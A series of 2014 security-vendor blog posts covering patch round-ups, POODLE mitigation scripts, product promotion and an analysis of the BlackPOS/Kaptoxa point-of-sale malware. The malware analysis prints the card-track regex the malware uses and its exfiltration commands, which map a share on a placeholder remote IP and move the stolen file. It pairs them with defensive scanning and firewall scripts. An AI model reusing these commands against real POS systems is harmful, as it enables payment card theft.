October Patch Tuesday Round-Up


Microsoft had a rough month.  Instead of the nine announced bulletins they released eight.  Of those eight, three updates were plugging vulnerabilities that were being exploited in the wild.  An additional Microsoft Security Advisory caused some issues and was pulled from the downloads site.  On the non-Microsoft front, there were releases from Adobe, Google, and Oracle that should be on your high priority list.  Oracle released their quarterly Critical Patch Update, which included many high severity vulnerabilities in Java SE.  Adobe released a Flash Player update, which also caused Internet Explorer and Google Chrome to release updates to support the plug-in.  Here is a priority breakdown for security updates this month and details on known issues:

Shavlik Priority 1 Updates (Priority 1 updates should be applied as soon as possible):

  • MS14-056: Cumulative Security Update for Internet Explorer (2987107) – This update is rated as Critical by Microsoft and resolves fourteen privately reported vulnerabilities in Internet Explorer which could lead to Remote Code Execution.  The vulnerabilities are all memory related exploits and the update changes how IE handles objects in memory to resolve them.  One of the vulnerabilities resolved (CVE-2014-4123) has been exploited in the wild as a sandbox escape.
  • MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414) – This update is rated as Critical by Microsoft and resolves three privately reported vulnerabilities in .NET Framework which could lead to Remote Code Execution.  On .NET 4.0 iriParsing is disabled by default, but on .NET 4.5 this feature cannot be disabled.  If you are running .NET 4.5 this is a higher priority.
  • MS14-058: Vulnerability in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) – This update resolves two privately reported vulnerabilities in Microsoft Windows which could lead to Remote Code Execution.  Both of the vulnerabilities (CVE-2014-4148 and CVE-2014-4113) in this bulletin have been reported in targeted attacks in the wild.  The two vulnerabilities could be chained together, but the reported attacks were exploiting each in separate attacks.
  • MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) – This update is rated as Important and resolves one privately reported vulnerability in Microsoft Windows.  Although only rated as Important, this update resolves a vulnerability (CVE-2014-4114) that has been detected in targeted attacks reported in the wild.
  • APSB14-22: Security updates available for Adobe Flash Player – This update is rated as a Priority 1 by Adobe and resolves three vulnerabilities in Adobe Flash Player.  Two of the vulnerabilities are memory corruption issues and the third is an integer overflow which could lead to Code Execution.  In addition to the Flash Player update there is an IE Security Advisory and a Google Chrome update that need to be deployed to resolve the vulnerabilities in the Flash browser plug-in.
  • MSAF-031: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer – This advisory updates Internet Explorer to support the latest Adobe Flash Player Plug-In update.  The Flash Player update is a Priority 1 update resolving three vulnerabilities.
  • CHROME-114: Chrome 38.0.2125.104 – This is a High priority update from Google to update the Adobe Flash Player Plug-In.  The Flash Player update is a Priority 1 update resolving three vulnerabilities.
  • Java7-71: Java 7 Update 71 – This update is part of the Oracle Critical Patch Update release for Q4.  The release resolves 25 vulnerabilities, 22 of which are exploitable over the network without authentication.  Oracle has rated this update as Critical.  It includes one vulnerability with a CVSS score of 10.0 and several others scoring in the 9s.

Shavlik Priority 2 Updates (Priority 2 updates should be tested and rolled out in a reasonable time frame, typically within 10-30 days of release):

  • MS14-059: Vulnerability in ASP.NET MVC Could Allow Security Feature Bypass (2990942) – This update resolves one publicly disclosed vulnerability and is rated as Important.  The vulnerability is mitigated by XSS filters in IE 8, 9, 10, and 11, and workarounds are available to block ActiveX controls for Local Intranet Security Zones.  A user would need to be convinced to view a specially crafted website or click a link in an email message or Instant Messenger message to be exploited.
  • MS14-061: Vulnerability in Microsoft Word and Office Web Apps Could Allow Remote Code Execution (3000434) – This update resolves one privately reported vulnerability and is rated as Important.  An attacker must convince a user to open an attachment or access a specially crafted website.  If exploited the attacker would gain the same user rights as the current user.  Limiting users to less than Administrator user rights can mitigate the exposure if exploited.
  • MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) – This update resolves a publicly disclosed vulnerability in Microsoft Windows and is rated as Important.  The vulnerability is part of the Message Queuing component which is not installed by default.  It must be enabled by a user with Administrator privileges.  An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

Shavlik Priority 3 Updates (Priority 3 updates should be evaluated to determine potential risk to the environment and tested and rolled out in a reasonable time frame if applicable):

  • MS14-063: Vulnerability in FAT32 Disk Partition Driver Could Allow Elevation of Privilege (2998579) – This update resolves one privately reported vulnerability in Microsoft Windows which could lead to Elevation of Privilege.  The attacker must have physical access to the system to be able to exploit the vulnerability.
  • FF14-012: Firefox 33.0 – Mozilla released Firefox 33.  This update does not include security fixes, just new features and bug fixes.

Watch List:

  • MS14-A12: Security Advisory KB 2949927: Availability of SHA-2 Hashing Algorithm for Windows 7 and Windows Server 2008 R2 – The update has been pulled due to issues impacting systems after the update.  Some systems have had to be restored from CD-ROM to recover.  If you have already deployed this Advisory you may need to roll it back.

For access to Shavlik’s Patch Tuesday webinar or presentation you can go to our webinars page and check out the ‘Recent Webinars’ section and click view. You can also sign up for the October Patch Tuesday webinar where we will discuss the Patch Tuesday release for all of the critical apps that affect you.



No POODLES Allowed! How to Avoid the POODLE Vulnerability


Ever wonder why poodles seem so evil? Maybe it is because of the pretentious haircuts and pink bows. I suppose I would have a mean disposition if someone dressed me up like that every day. Whether you are a fan of the breed or not, I think we can all agree that POODLE is something that none of us would allow. I am referring to the recently discovered SSL 3.0 vulnerability called POODLE (Padding Oracle On Downgraded Legacy Encryption).

This dog may have teeth and an unfriendly disposition, but it might have more bark than bite.

The issue is at a protocol level, taking advantage of how SSL 3.0 encrypts using CBC mode ciphersuites. I am not a crypto expert, but here is an interesting write-up that explains it in terms that even my rudimentary crypto knowledge can grasp. The solution? Do not allow POODLE. Or more importantly, do not allow SSL 3.0.  This recommendation is already cropping up from vendors and security experts. SSL 3.0 is old and outdated (18+ years). Many vendors and security experts are calling for the end of SSL 3.0, and a couple of your favorite browsers are taking steps in the near future to make this a reality. See posts from both Mozilla and Google hinting at near term removal of SSL 3.0 support from the popular Firefox and Chrome browsers.


You can start taking steps to remove this threat from your environment and remove the threat from your highest risk users, those who leave the network and do crazy things like connect up to free wi-fi at the airport, coffee shop, etc. Those are the users who are going to be most at risk.

There are a number of vendors starting to respond with guidance on how this can be locked down, and all of it is pretty similar: disable SSL 3.0 on the servers and in the browser. Disabling it on either the client or the server prevents the downgrade attack (the connection tries to negotiate TLS, but is deliberately forced down to SSL 3.0 so it can be exploited). If either end refuses the SSL 3.0 protocol, the attack cannot succeed.

Here are some helpful links from some of the large vendors out there. The difficulties will come in for appliances and other devices that do not give much for configuration options.

See Microsoft Advisory 3009008, or this KB article on disabling SSL 3.0 in IIS.

Apple has not been too helpful based on the response seen in this community post. Talk to your internet provider? Really?

The guidance to our customers is to disable SSL 3.0 to take the teeth out of this POODLE. The GPO from Microsoft and the registry key in the KB article will allow you to disable SSL 3.0 on your clients and your servers. This does two things. For the clients, you remove the threat of one of your users getting on an unprotected Wi-Fi and being exposed while connecting to a web service that allows SSL 3.0. For your servers, you remove the threat of them being the weak link when your customers/clients are connecting from unprotected Wi-Fi. If both ends of the connection disable SSL 3.0, you have effectively removed the threat.
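As an added example (not from the original post, and not Microsoft's own script), the PowerShell below audits the SCHANNEL registry values that Advisory 3009008 uses to control SSL 3.0 and, when run with -Disable from an elevated session, sets them for both the client and the server side; the -Disable switch and the output wording are this example's own.

```powershell
# Added example (not the original post's or Microsoft's script): audit the
# SCHANNEL registry values that control SSL 3.0 and, with -Disable, turn the
# protocol off for both the client and the server side of the Windows TLS stack.
# Run from an elevated session; SCHANNEL reads these values at boot, so reboot.
param(
    [switch]$Disable    # without this switch the script only reports the current state
)

$Base = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0'

foreach ($Side in 'Client', 'Server') {
    $Key = Join-Path -Path $Base -ChildPath $Side

    # A missing key or value means the OS default applies, which for SSL 3.0
    # in 2014 meant "enabled"; that is exactly the state POODLE relies on.
    $Current = (Get-ItemProperty -Path $Key -Name Enabled -ErrorAction SilentlyContinue).Enabled
    $State = 'enabled'
    if ($null -eq $Current) { $State = 'default (enabled)' }
    if ($Current -eq 0)     { $State = 'disabled' }
    Write-Output ("SSL 3.0 {0,-6}: {1}" -f $Side, $State)

    if ($Disable -and $Current -ne 0) {
        if (-not (Test-Path -Path $Key)) { New-Item -Path $Key -Force | Out-Null }
        # Enabled=0 refuses the protocol outright; DisabledByDefault=1 additionally
        # keeps it out of the default list for applications that do not name protocols.
        New-ItemProperty -Path $Key -Name Enabled -Value 0 -PropertyType DWord -Force | Out-Null
        New-ItemProperty -Path $Key -Name DisabledByDefault -Value 1 -PropertyType DWord -Force | Out-Null
        Write-Output ("SSL 3.0 {0,-6}: now disabled (reboot required)" -f $Side)
    }
}
```

Run it once without the switch to see where a fleet stands, then with -Disable through your deployment tooling; the GPO route from the advisory achieves the same end state for domain-joined machines.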



Patch Tuesday Advanced Notification October 2014

Bunker Blog

Microsoft has announced 9 bulletins for October 2014, three of which are rated as Critical.  Just a reminder that back in August Microsoft put a hard deadline on implementing the Update 1 (KB2919355) for Windows 8.1 and Server 2012 R2, making it so users need to install Update 1 in order to keep their systems updated.

The first bulletin is a Critical update for Internet Explorer.  There is a strong likelihood it will resolve a number of vulnerabilities in the double digits.  Since June we have seen a trend of double digit vulnerabilities regarding Memory Corruption issues in IE.  Expect this to be a high priority to be rolled out ASAP.

The second and third bulletins are also Critical and affect the Windows Operating System and .Net Framework.  Both could allow for remote code execution.

Bulletins four and six affect Microsoft Office.  One is listed as Moderate and one as Important.  Bulletin six also pertains to SharePoint and Office Web Apps.  For Office these patches will likely fall into the test adequately and roll-out in a timely manner category.  The SharePoint and Office Web Apps updates will require adequate testing before rolling out.

On top of what looks to be a large Patch Day from Microsoft we will also see Oracle’s quarterly Critical Patch Update next week.  Expect an update for Java that will include a large number of fixes and likely will have some urgency to roll-out.

Adobe is on a solid trend of releasing a Flash update on Patch Tuesday.  So far in 2014 there have been Critical updates to Flash every month.  All but one month have fallen on Patch Tuesday.  Expect Flash and expect it to be a priority.  If that releases we will see an IE Advisory to support the Plug-In update.

Also on the Adobe front, a number of issues have been reported on Acrobat Reader 11.0.9.  There is a chance for an update to resolve those issues.  If you have updated to 11.0.9 watch for this.

Google Chrome just had a rather large release, so, whether to support a potential Flash Plug-In update or to address other issues that may surface, we could well see a Google Chrome update.

Microsoft Security Bulletins:

  • 3 bulletins are rated as Critical.
  • 1 bulletin is rated as Moderate.
  • 5 bulletins are rated as Important.

Vulnerability Impact:

  • 5 bulletins address vulnerabilities which could allow Remote Code Execution.
  • 1 bulletin addresses vulnerabilities which could result in Security Feature Bypass.
  • 3 bulletins address vulnerabilities which could allow Elevation of Privileges.

Affected Products:

  • All supported Windows Operating Systems.
  • All supported Internet Explorer versions.
  • Microsoft .Net Framework
  • Microsoft Office 2007 and 2010
  • Microsoft SharePoint Server 2010
  • Microsoft Office Web Apps 2010
  • ASP.Net MVC


Join us as we review the Microsoft and third-party releases for October Patch Tuesday in our next monthly Patch Tuesday webcast, which is scheduled for Wednesday, October 15th at 11 a.m. CDT.  We will also discuss other product and patch releases since the September Patch Tuesday.

You can register for the Patch Tuesday webinar here.

Why Break SCCM Just To Add Functionality?

Last week, I had the opportunity to attend the Atlanta Systems Management User Group (atlsmug).  It had some great discussion as well as some really good presentations. One that stuck out to me was Joe Crawford’s presentation titled “Notes from the Field: Why Pull DPs Are Like Pulling Teeth.” He went into some good details about how to leverage the Microsoft System Center Configuration Manager (SCCM) client to pull software packages to distribution points.

The presentation got me thinking. It seems that SCCM admins work hard to make sure they can get what they need from SCCM. It needs to be configured and customized for their environments, which is not all that easy. With large organizations and complex networks, getting SCCM to work properly just to distribute software and updates can be a real challenge.

My interaction with SCCM users shows that many of them did not set up the initial install. Because of the complexity of getting an implementation going from the beginning, one of two things usually happened: they hired a contractor, or they used the server team to get it going.

So why break all of that? Many SCCM add-on products claim to plug into SCCM, but drag with it additional processes, consoles, and infrastructure based on light integration from an existing vendor’s software. They simply have some type of integration point (push or pull data) with SCCM, but are not truly integrated.

Shavlik surveyed SCCM users and found that over 68 percent of those surveyed preferred a completely integrated tool. (Raise hand, turn palm toward forehead, slap). It seems that this is a no brainer, but somehow many software vendors still create tools that add additional functionality but require you to use their proprietary distribution tools. If you’ve already built your implementation of SCCM to handle all your network segments, remote locations and even remote workers, why get a solution that requires you to install all that again?

One of the most important functions of SCCM is patch management, and many organizations use it to patch server and client systems but just for the OS or Microsoft applications. With 86 percent of vulnerabilities coming from software outside of the OS and with all the news of retail, healthcare, and now financial security breaches, it’s becoming even more important to patch all of your systems.

Shavlik has provided Shavlik Patch for Microsoft System Centers. Take a look at how we were able to provide you a simple and intuitive add-on for SCCM for third-party application patching. At the Atlanta user group meeting, John Rush did a great job of showing how easy it was to add third-party patching to SCCM without additional infrastructure.

The Communicator’s Corner: Database Maintenance Tool– The Importance of Keeping Your Tools Running at Peak Efficiency

I have a 1997 Acura Integra that I have owned for over 16 years. I am often asked why I still drive such an old car and my answer is always the same: the car is still running great, it gets great gas mileage (34 mpg!), it is still in relatively good condition, so why get rid of it? Now, I am not a gear-head and truth be told I know very little about the mechanical workings of a car. But what I do know is basic maintenance. I am very conscientious about doing the little things that keep the car going, including changing the oil myself on a regular basis. I am convinced that it is the basic maintenance that I do on a consistent basis that keeps this car humming at peak efficiency.

Did you know that you should also perform basic maintenance on Shavlik Protect in order to keep it operating at peak efficiency? It’s true, and we provide you with several tools to do just that. In this blog article I’d like to introduce you to one of those tools, the Database Maintenance tool.

Over time, the SQL database you use with Shavlik Protect can grow quite large and can get bogged down with old data. It is important to perform periodic maintenance on your database so that, like my trusty old car, it continues to hum along at peak efficiency. To help with this, Shavlik provides you with a Database Maintenance tool. It is available from the Shavlik Protect Tools > Operations menu and its purpose is to help you perform maintenance tasks on your SQL database.

Some of the tasks that the Database Maintenance tool enables you to perform are:

  • Delete old scan results that are no longer needed
  • Set limits on the number of scan results to store in the database
  • Rebuild the database indexes after old data is removed
  • Create backup copies of the database and the transaction log

And to make life easier for you, you can create a scheduled job that performs the database maintenance tasks on a regularly scheduled basis. (Refer to my previous blog article, Automated Patching for Busy People, for the importance of simplifying life by using automated tasks.)

Nice, huh?! Interested in learning more? I hope so! You can find out everything you need to know about the Database Maintenance tool in the Shavlik Protect Help system available here: http://help.shavlik.com/Protect/onlinehelp/91/ENU/PRT.htm

PAC Helps Drive the Future of Shavlik Products

Last week, the Shavlik Product Advisory Council (PAC) met for a two-day, onsite meeting at the Shavlik office in Minneapolis.

During this event, PAC members learned more about Shavlik’s strategy and roadmap, reviewed and also test-drove Shavlik Protect 9.2, and most importantly, provided insight and guidance on Shavlik’s product direction.

Thanks to all PAC members for your participation in this event!

In the photos below: (top) PAC members discuss upcoming features in Protect 9.2; (middle) a PAC member shares his idea for an ideal security dashboard; (bottom) it wasn’t all work, as PAC members and members of the Shavlik team take in a rare Twins win at Target Field.






The Communicator’s Corner: Automated Patching for Busy People

We all know by now how important it is to patch our computers to keep bad things from happening. We also know that most IT administrators are extremely busy and don’t have the time, or inclination, to devote themselves to this admittedly mundane, but critical, task. So what’s the answer? Automation.

Automation is the perfect solution for performing what would otherwise be a tedious task. Take for example the latest trend with retirement plans. Until recently, if an employee wanted to participate in the company retirement plan, they were forced to work through a mountain of paperwork on their own, and all too often people just gave up. So, many companies have decided to move away from the “opt in” approach and are instead offering automatic enrollment plans. It is human nature to take the path of least resistance, so by automating the desired path and forcing employees to manually opt out, rather than opt in, HR folks have noticed a much higher rate of participation in retirement plans. (Yea!)

The same principle holds true when it comes to implementing your patch process; it is much more likely to happen if it is automated. So is there a tool that provides automated patching and that secures your computers almost without thinking? Yes, and it is called Shavlik Protect.

How to automate your patching process using scheduled scans and deployments

The Shavlik Protect interface makes it extremely easy to set up scheduled patch scans and deployments on the machines in your organization.  Using a few basic features, (such as machine groups, scan templates, and deployment templates) you can easily configure Shavlik Protect to automatically perform recurring scheduled scans and to automatically deploy any missing patches that it detects during a scan. Doing so creates a completely automated patch scan and deployment operation.

Want to know how it is done? This screenshot probably tells you most of what you need to know.







But if you are like me, and you like to know all the details, check out our video on how to automate scheduled patching. You can find it here: http://www.shavlik.com/support/training-videos/protect/.

Unattended Consoles

Let’s take things one step further. First, a lead-in: If you happen to work in an organization with many office sites located across the country or around the world, you might be (you should be!) using multiple Shavlik Protect consoles. You can set things up so that the machines at a central site (probably your company headquarters) are managed by a central console, while the machines at your remote sites are managed by remote consoles. The data rollup feature can then be used so that the central console receives data about the machines being managed by the remote consoles.

With the stage now set, wouldn’t it be nice not to have to worry about any ongoing administration tasks at your remote consoles?  Well, once again, with Shavlik Protect you can! You can automate the system by implementing an unattended console at each remote site. An unattended console is a console you set up once. After that the console automatically updates its own files and manages its machines without human assistance.

Here’s how it works: The unattended console is configured to automatically perform periodic scans and to automatically deploy any patches it detects as missing on its target machines (see above). The console will also contain a patch scan template that is defined to look for a particular set of patches. The set of patches is contained in a patch list that resides on a distribution server. (Distribution servers were discussed in a previous blog article.)

Now, when new patches are released by a vendor (for example, the monthly patches released by Microsoft Corporation), you simply update the patch list on the distribution server. When the unattended console performs its next scheduled scan it will automatically reference the updated list and will patch its target machines, all without human intervention.

The following figure illustrates an unattended console configuration.

Figure: unattended console configuration, showing the rollup console, the managed machines, the unattended console, the distribution server and the patch list.


Patch Management Automation: Turning a Weakness Into a Strength

One of the single greatest challenges that IT professionals face today is the arduous task of keeping up with the constant bombardment of new vulnerabilities. According to the folks at NIST (the National Institute of Standards and Technology), in 2013 the total number of new vulnerabilities that were identified eclipsed 5,186. http://web.nvd.nist.gov/view/vuln/statistics-results?cves=on

That breaks down to 14 new vulnerabilities a day, which, without the appropriate level of patch management, makes the challenge of managing this situation almost insurmountable!  With the continuous flow of new software technology, and the constantly changing network landscape (physical, virtual and mobile…), the challenges associated with Patch Management will continue.

There is hope! The challenges associated with Patch Management will continue to persist, but by injecting the proper level of automation into the mix, what was once an unmanageable issue can be easily contained. So…if you’re reading this post, and the situation I just described sounds familiar, there is a solution.

If you’re not able to keep up with the challenges associated with patch management, you should consider introducing technology that will automate this process for you, saving both time and money. Most importantly, it will help remove what today is an unknown level of risk which can provide peace of mind, and let you move on to address more pressing and important priorities. To learn more about what you can do to address the ongoing challenges associated with patch management and patch management automation, visit: http://www.shavlik.com/solutions/

Consumers Beware: Protect Yourselves from Security Breaches

In this blog series on security breaches, we’ve talked a lot about what retailers can do to secure their IT infrastructures and to protect customer data. However, in today’s environment, it is impossible for any company, not to mention a retailer, to be 100% secure. The question isn’t IF your favorite store will get hacked; the question is WHEN your favorite store will get hacked.

Given this reality, let’s turn our attention to what we as consumers can do to protect ourselves. Following three basic practices will limit your risk of exposure to nearly zero, meaning you can continue blissfully shopping at all of your favorite stores, regardless of whether or not you’ve seen their name in the paper recently.

#1 – Ditch the debit cards

As I was first venturing into the adult world, one piece of financial advice my dad gave me was, “Debit cards are evil.” It was the late ‘90s, so data breaches and BlackPOS weren’t top of mind. Heck, e-commerce was just kicking off then. He was thinking about old school things like earning interest in your checking account, earning cash back from credit cards, and the risk of the card being lost or stolen.

Fast forward to today’s environment and Dad’s advice is better than ever. If a debit card number is compromised, your checking account can be emptied and your money inaccessible while you go through what can be a lengthy process of disputing the charge. With credit cards, on the other hand, you are not obligated to make payments that are under dispute, so the disputed funds stay with you. In reality your only risk from a compromised credit card number is the inconvenience of having to update auto-payments if your credit card company issues a new number. That is if you do #2…

#2 – Review your statements carefully

We as consumers do have an obligation to review our credit card statements each month and to promptly report any erroneous charges. In doing so, be especially mindful of small charges, say $0.05, that might be testing the viability of your card number. That type of charge is an early indicator that your credit card number has fallen into the hands of evil, so don’t let the size of the charge keep you from reporting it.

By carefully reviewing your credit card statement each month and reporting any charges that don’t seem right, you shift the responsibility for unauthorized charges from yourself to your credit card company.

#3 – Don’t stress out about the headlines

Working for a security software company, I get questioned a lot about retail security breaches by friends and family. When Target came under fire last fall, a lot of folks asked if I was going to stop shopping there and if they should stop too. The thought of not shopping at Target had never crossed my mind. Shoot, I live in Minnesota; I’d give up hockey before giving up Target.

Seriously, though, if you’ve followed the steps above, there’s little if any effect on you if your credit card info is compromised. You don’t need to stop shopping at a store because you see its name in the paper. Swipe away and leave the worry to your favorite retailer’s IT department.

If you’d like to learn more about recent security breaches, what companies can do to defend their networks, and what consumers can do to protect themselves, please join us for the following Shavlik webinar.

Security Breaches Everywhere – Help your company stay out of the headlines
Thursday, October 2, 2014 10:00 am CDT
Register Now



Retailers Beware: a Swipe of the Credit Card Could Swipe your Data

In the past year, we’ve heard about numerous major retailers getting hit by a series of different variants of malware designed to swipe their customers’ credit card information.  Last week, I sat down with Anne Steiner and captured some of our thoughts on this matter. Today, I’m going to take that Q&A session we had down a level to where we discuss the technology that is causing this wave of cyber-theft.

To begin with, let’s discuss the attacks. In years past, you would typically hear about companies who leaked information from a central point. A typical example: hackers would try to infiltrate a network and then go after servers that they could tell housed critical databases containing customer information. After taking control of that system, through whatever means they used, they’d then use various mechanisms of exfiltration to take that data and send it offsite all in one fell swoop.

The challenge with these types of attacks is that cyber-security has advanced through the years to make this more difficult. IT Administrators first identify their “primary targets” on networks where data is stored. Then, they create various levels of security to prevent that data from being accessed from nodes that shouldn’t have access to it, while also putting IP-level security around it to make sure that if the data was compromised it couldn’t freely flow off the server into the wrong hands. The gist is that it is increasingly difficult for hackers to find servers that are vulnerable and then exploit them without detection.

The challenge with the most recent wave of attacks is that the hacking community has realized that these attacks are difficult, and once again the law of governing dynamics for cyber-warfare has taken over. That law states:

1)  Attacks will trend towards the most vulnerable machines on a network.

2)  Attacks will trend towards the most vulnerable software on a network.

3)  Attacks will trend towards the most valuable data on a network.

Taken together, these have forced a change in the way in which hackers go about exploiting vulnerabilities and how they get data off of a network.


Fast-forward to the present day, where cyber security remains a challenge. We have already discussed that most of your server administrators are securing servers with patching and various levels of anti-malware detection. The challenge is that the same security perimeter does not exist at most of the user endpoints on a network. In general, most of those endpoints don’t contain highly valuable data, unless you have specific knowledge of who you are hacking. In the retail sector though, you know that there are cash-register terminals (Point of Sale systems) out there that are handling the transactions with customers, and these nodes get interesting. In general, they are Microsoft Windows nodes running Point of Sale Software and they are collecting credit cards at a rate of over 97% of consumer transactions. This is where things get interesting for hackers.

Let me give you a non-technical description of the problem for a moment. Imagine I was a thief breaking into your home. I need to target you, but realistically, I don’t know who lives there and I just kind of brute force my way in. When I get inside, I start looking around for valuable stuff to steal. Maybe I see some good stuff, but for the really valuable stuff like jewelry, credit cards, money, or even electronics, I need to dig around a bit. It takes a while, right? In the case of retail, imagine the scenario is different… I want credit cards; I know they are generally at the point of sale systems, and I know where those are located in the store. I can get in, look for exactly what I want, and then get out.

This is the power of knowing your target and what you want to steal; you can get far more specific, and that’s what is fueling all of these attacks.

We’re going to take a step back for a moment and dissect a specific malware threat known as BlackPOS or Kaptoxa. This malware is specifically designed to run on Point of Sale systems, and it is further designed in a two-step process to steal the data without detection. We’ll talk about its approach and then how to protect yourself from it.


First off, Kaptoxa has to make it onto your network. In general, the most direct route is an unsecured or unpatched machine, through which hackers are able to gain access to your network with some sort of elevated privileges. After they get onto the network, they begin to spread Kaptoxa around via a number of freely available scripts on the internet that identify the Point-of-Sale (POS) systems and then infect them.

After infection, Kaptoxa operates as two different processes. The first attaches itself to the POS application and begins to look for credit card information; the second runs periodically, waking up to offload the captured information to external servers.

For the first process, Kaptoxa does something so simple and effective it’s scary. It attaches to the running POS process and reads its memory. During normal operation of the program, the POS application reads credit card information in from a card swipe reader.  This data follows an incredibly uniform pattern that resembles something like this:


However, this is the problem! The data is so uniform that if I can attach myself to a process and look at its memory, at some point a credit card track will be visible to me just by scanning the memory for a pattern like that. While that sounds tough, a rough scrape of that information can easily be done with a simple grep command using a pattern that looks like this:

(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))

So, now that Kaptoxa knows what data it is looking for, where to find it, and how to extract it from memory, the last bit it’ll do is store it somewhere on the hard drive so it can pick it up later. In some of the early variants, it placed it right into the Windows System directory in a falsely named DLL file and just stored it in plain text.

With the main process running, Kaptoxa is constantly looking for more data to exploit and dropping it into a directory to be sent off later. That file will just continue to grow over time. The role of the second process is to wake up occasionally and move the data offsite. Here again the Kaptoxa process is simplistic in its approach to date: it uses basic internet file-share mapping via SMB/CIFS to connect a drive to a remote server that is set up for open sharing, copies the file, and then removes the share. While the approach has differed by variant, the command syntax for execution will look something like:

net use L: \\<[X.X.X.X]>\c$\WINDOWS\twain_32 /user:<[User]> <[Password]>

move <Windows>\system32\winxml.dll L:\<[Machine Name]><[Day]><[Month]><[Hour]>.txt

net use L: /del

The script above connects a drive mapping called “L:” to a remote server, moves the file, and then deletes the drive mapping after it is done. One quick execution of this process later, the file is gone and your data has been extracted.


First off, I’d be remiss if I didn’t remind you that the malware compromised your network through a security flaw. If the systems had been protected, they wouldn’t have been compromised in the first place. The one thing to stress here is: don’t just protect your servers; your workstations need to be patched and managed too to prevent this. At the same time, if it has already happened, you want to be prepared for that too.

In all the variants we’ve seen so far, there are two ways to protect yourself, each targeting a specific aspect of the malware. Let’s start with the process/memory thread. In that case, the simplest way to make sure you aren’t vulnerable is to make sure card data is not sitting on your POS hard drive or in the registry. There is a very simple way to take the regular expression I listed above and put it into a PowerShell script that scans your Windows files for the same signature Kaptoxa is looking for. If you find it on your hard drive, I promise you, if you are PCI compliant, it shouldn’t be there. You’re infected and should take immediate measures to shut down the remote nodes while you clean up the malware.
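As an added example (not code from the original post or from Shavlik), here is a PowerShell scan that applies the regular expression quoted above to every file under a directory and reports only masked card numbers; the scan directory, the sample file it creates under %TEMP% and the test card number inside it are all constructed for the demonstration.

```powershell
# Added example, not part of the original post: scan a directory tree for files that
# contain the Track 1 + Track 2 pattern quoted above and report each hit with a masked PAN.

# The regular expression from the post, unchanged.
$TrackPattern = '(((%?[Bb]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}\/[A-Za-z\s]{0,26}\^(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9]|2[0-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))'

function Find-TrackData {
    param(
        [Parameter(Mandatory)] [string] $Path,   # directory to scan, e.g. the Windows system directory
        [long] $MaxFileBytes = 100MB             # skip very large files (page file, hibernation file)
    )
    $regex = [regex]::new($TrackPattern)
    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $_.Length -le $MaxFileBytes } |
        ForEach-Object {
            try {
                # The dumps described in the post are plain text, so a text read is enough;
                # track data embedded in a binary file would need a byte-level scan instead.
                $text = [System.IO.File]::ReadAllText($_.FullName)
            } catch { return }   # locked or unreadable file: move on
            $hits = $regex.Matches($text)
            if ($hits.Count -eq 0) { return }
            foreach ($m in $hits) {
                # The first 13-19 digit run in the match is the Track 1 PAN.
                $pan = [regex]::Match($m.Value, '[0-9]{13,19}').Value
                [pscustomobject]@{
                    File      = $_.FullName
                    Offset    = $m.Index
                    # Never write the full PAN to a log or console; keep only the last four digits.
                    MaskedPan = ('*' * ($pan.Length - 4)) + $pan.Substring($pan.Length - 4)
                }
            }
        }
}

# Self-test against a constructed file. The PAN is the well-known 4111... test number,
# not a real card, and the file name mirrors the fake DLL name mentioned in the post.
$testDir = Join-Path $env:TEMP 'trackscan-demo'
New-Item -ItemType Directory -Path $testDir -Force | Out-Null
$fake = '%B4111111111111111^DOE/JOHN^2512101000000000?;4111111111111111=25121010000000000?'
Set-Content -Path (Join-Path $testDir 'winxml.dll') -Value "noise $fake noise" -Encoding ASCII

Find-TrackData -Path $testDir | Format-Table -AutoSize
```

Point `-Path` at the system directory or the whole drive for a real sweep; any hit on a PCI-scoped POS terminal is grounds to isolate that node before cleanup.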

The second prevention method is more of a network approach: barring a specific business reason, none of your POS systems should be attaching a network drive to an IP address outside the company. To put a hard stop on this, a blanket deny rule can be added to your firewall using the general format:

Block: TCP

Port: 445

From: Internal

To: External IP

If you are looking for a less-invasive rule, I’d suggest country filters for this SMB/CIFS traffic.
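As an added example (not from the original post), the same "block TCP 445 from internal to external" rule expressed for Windows Firewall with the NetSecurity cmdlets (Windows 8 / Server 2012 and later), so it can be pushed to the POS terminals themselves; treating the RFC 1918 private blocks as "internal" is an assumption, so adjust the ranges to your own addressing.

```powershell
# Added example, not part of the original post: host-level version of the firewall rule.
# Windows Firewall has no "not in subnet" operator, and Block rules take precedence over
# Allow rules, so "external" is spelled out as every unicast IPv4 range outside RFC 1918.
$ExternalRanges = @(
    '1.0.0.0-9.255.255.255',        # everything below 10.0.0.0/8
    '11.0.0.0-172.15.255.255',      # between 10/8 and 172.16/12
    '172.32.0.0-192.167.255.255',   # between 172.16/12 and 192.168/16
    '192.169.0.0-223.255.255.255'   # above 192.168/16 up to the end of unicast space
)
$RuleName = 'Block outbound SMB to external addresses'

# Outbound TCP 445 (SMB/CIFS) to any address in those ranges is dropped, on every profile.
New-NetFirewallRule -DisplayName $RuleName `
    -Direction Outbound -Protocol TCP -RemotePort 445 `
    -RemoteAddress $ExternalRanges -Action Block -Profile Any -Enabled True | Out-Null

# Verify the rule landed with the address filter you intended.
Get-NetFirewallRule -DisplayName $RuleName | Get-NetFirewallAddressFilter
```

Pair this with logging of dropped packets (Set-NetFirewallProfile -LogBlocked True) so an attempted `net use` to an outside host shows up in the firewall log rather than failing silently.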


So, let me just say this blog isn’t just for retail. What started as stealing card swipes is proliferating into variants that haven’t been successful yet but are beginning to come together to steal banking data, financial records, health insurance/patient information, and other types of structured data. We can expect this threat to evolve rapidly in 2014/2015, and everyone should implement best practices to:

